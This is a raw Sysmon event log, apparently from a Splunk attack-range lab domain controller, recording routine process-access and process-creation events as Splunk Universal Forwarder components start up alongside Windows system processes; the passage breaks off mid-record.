13:32:17.733{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013315Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:17.733{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013314Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:17.733{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-47E1-6000-4705-000000009A01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013313Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:17.733{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-47E1-6000-4705-000000009A01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013312Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:17.593{08A6967A-47E1-6000-4705-000000009A01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013329Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:18.561{08A6967A-47E2-6000-4805-000000009A01}55443064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013328Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:18.405{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-47E2-6000-4805-000000009A01}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013327Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:18.405{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013326Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:18.405{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013325Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:18.405{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013324Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:18.405{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013323Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:18.405{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-47E2-6000-4805-000000009A01}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013322Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:18.405{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-47E2-6000-4805-000000009A01}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013321Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:18.406{08A6967A-47E2-6000-4805-000000009A01}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013338Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:19.374{08A6967A-47E3-6000-4905-000000009A01}21525872C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013337Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:19.217{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-47E3-6000-4905-000000009A01}2152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013336Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:19.217{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013335Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:19.217{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013334Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:19.217{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013333Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:19.217{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013332Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:19.217{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-47E3-6000-4905-000000009A01}2152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013331Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:19.217{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-47E3-6000-4905-000000009A01}2152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013330Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:19.078{08A6967A-47E3-6000-4905-000000009A01}2152C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013346Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:20.327{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-47E4-6000-4A05-000000009A01}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013345Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:20.327{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013344Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:20.327{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013343Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:20.327{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013342Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:20.327{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013341Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:20.327{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-47E4-6000-4A05-000000009A01}2272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013340Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:20.327{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-47E4-6000-4A05-000000009A01}2272C:\Program 